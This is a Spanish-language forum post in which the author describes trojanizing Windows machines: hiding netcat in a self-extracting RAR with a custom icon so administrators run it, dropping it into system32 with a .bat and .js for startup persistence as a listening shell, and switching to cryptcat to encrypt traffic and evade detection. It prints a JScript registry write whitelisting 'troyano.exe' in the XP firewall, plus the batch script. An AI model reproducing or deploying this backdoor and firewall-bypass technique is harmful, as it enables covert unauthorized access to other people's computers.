Pues es exelente poder realizar una conexión remota a una shell de otar pc y que todos los paquetes de entrada y salida puedan ser cifrados, asi ya no podran saber lo que pasa como por ejemplo sniffearlo o cosas asi.
Yo en mi caso utilizaba el netcat dentro de un rar ejecutable con un icono a mi eleccion y cuando el administrador de u server o de una makina cualkiera lo ejecutaba se descomprimia el netcat en system32 junto a un bat y un *.js
con lo cual el script ordenaba a que iniciara el netcat cada ves que se iniciara la pc con los comandos dados y dejaba a escucha el bat.. algo asi como esto
echo Bienvenido a mi makina infectada
echo.
pause
command.com
:p pero ahora gracias al criptcat lo podré cifrar y se hará cada ves mas indetectable,... ademas no es necesario cambiarle el nombre para que no lo detecte el cortafuegos, o sea igual se lo cambio, pero con otro script le hago una entrada de registro como esta:
var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.RegWrite("HKLM\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List\\troyano.exe", "C:\\WINDOWS\\system32\\troyano.exe");
function Welcome() {
var WSHShell = WScript.CreateObject("WScript.Shell");
var intDoIt;
intDoIt = WSHShell.Popup(L_Welcome_MsgBox_Message_Text,
0,
L_Welcome_MsgBox_Title_Text,
vbOKCancel + vbInformation );
if (intDoIt == vbCancel) {
WScript.Quit();
}
}
y ya no me detectará el firewall del xp sp2 con todos sus parchesitos
y cuando entro con el netcat o desde otra pc con telnet me da la vianvenida del bat y me deja la shell
:D:D
Autor
En línea
